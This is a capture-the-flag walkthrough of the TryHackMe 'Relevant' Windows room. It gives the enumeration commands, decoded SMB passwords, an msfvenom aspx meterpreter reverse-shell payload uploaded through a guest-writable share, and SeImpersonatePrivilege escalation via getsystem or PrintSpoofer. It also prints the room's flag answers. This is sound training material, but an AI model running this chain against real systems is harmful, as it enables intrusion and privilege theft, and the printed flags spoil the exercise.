Relevant Writeup - TryHackMe

Relevant Writeup - TryHackMe

This is a writeup for the Relevant room, available on TryHackMe.

Today's system vulnerability is based on Token Impersonalization. In order for this to work, we need a tool that uses a named pipe to deceive an NT AUTHORITY\SYSTEM account into connecting and authenticating an RPC server they control by exploiting some characteristics of the Istorage COM interface. The RottenPotato and RogueWinRm Exploits are widely used to exploit this vulnerability.

Introduction

Room Description

You have been assigned to a client that wants a penetration test conducted on an environment due to be released to production in seven days.

Notes & Observations

  • Gaining access to the machine: there is a strange nt4wrksv folder that can be found among the SMB shares and on the website as well
  • I described the automated way of gaining root access (Metasploit's getsystem command). Behind the scenes, the tool creates a pipe server with limited privileges, after which it configures a Windows service (the client) to connect to the pipe created by the server. If you want to do it manually, then:
    • Create simple reverse shell ( shell_reverse_tcp instead of meterpreter/reverse_tcp)
    • Get the PrintSpoofer from GitHub
    • Upload it to the shared SMB folder and find this folder on the target machine
    • Execute PrintSpoofer.exe -i -c cmd on the target machine
  • It took me a lot of time to enumerate the websites and find the nt4wrksv folder
  • The credentials I found on the SMB didn't help much

Used tools: nmap, smbclient, ffuf, msfvenom, Metaslpoit, base64, PrintSpoofer.exe

Walkthrough

This chapter contains the all the steps necessary to answer the questions in this room.

Enumerate the Website

  1. Run full nmap scan:

    nmap <IP> -sS -Pn -n -sV -p-
    

    image.png

  2. Run directory search on the website on 49663 port to find the nt4wrksv folder:

    ffuf -u http://<IP>:49663/FUZZ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -t 100
    
  3. Check the nt4wrksv folder in the browser: image.png

  4. Check if you can access the passwords.txt file from this folder: image.png

Enumerate SMB

  1. Check SMB shares with smbclient, when asks for password, hit enter:

    smbclient -L //<IP>
    

    image.png

  2. Check the SMB shares with nmap scripts:

    nmap <IP> -p139,445 --script=smb-enum-users,smb-enum-shares
    

    image.png We have read/write access as guest users in the nt4wrksv folder.

  3. Access the nt4wrksv share and list its content:

    smbclient //<IP>/nt4wrksv
    

    image.png

  4. Read the content of the passwords.txt file:

    get passwords.txt -
    

    image.png

  5. Decode these two rows found in passwords.txt with base64:

    echo "Qm9iIC0gIVBAJCRXMHJEITEyMw==" -n | base64 -d
    Bob - !P@$$W0rD!123
    echo "QmlsbCAtIEp1dzRubmFNNG40MjA2OTY5NjkhJCQk" | base64 -d
    Bill - Juw4nnaM4n420696969!$$$
    

User Flag

Answer: THM{fdk4ka34vk346ksxfr21tg789ktf45}

  1. Create aspx reverse shell with msfvenom:
    msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<IP> LPORT=4440 -f aspx > shell.aspx
    
  2. Put it into the nt4wrksv SMB share by using the guest user or with Bob's credentials:

    smbclient //<IP>/ntwrksv -U guest
    put shell.aspx
    

    image.png

  3. Prepare multi handler meterpreter listener in Metaslpoit: image.png

  4. Run the reverse shell in the browser and catch it with the listener:

    http://<IP>:49/nt4wrksv/shell.aspx
    
  5. Get the user.txt file in this folder C:\users\bob\Desktop\user.txt: image.png

Root Flag

Answer: THM{1fk5kf469devly1gl320zafgl345pv}

  1. Check the account's privileges:

    woami /priv
    

    image.png It has SeImpersonatePrivilege that can be abused, with Metasploit you can automatically gain root access. If you want to do it manually, then follow the description at the beginning of this writeup.

  2. Use getsystem command to gain root privileges:

image.png

  1. Get the root.txt file in this folder C:\users\Administrator\Desktop\root.txt: image.png

References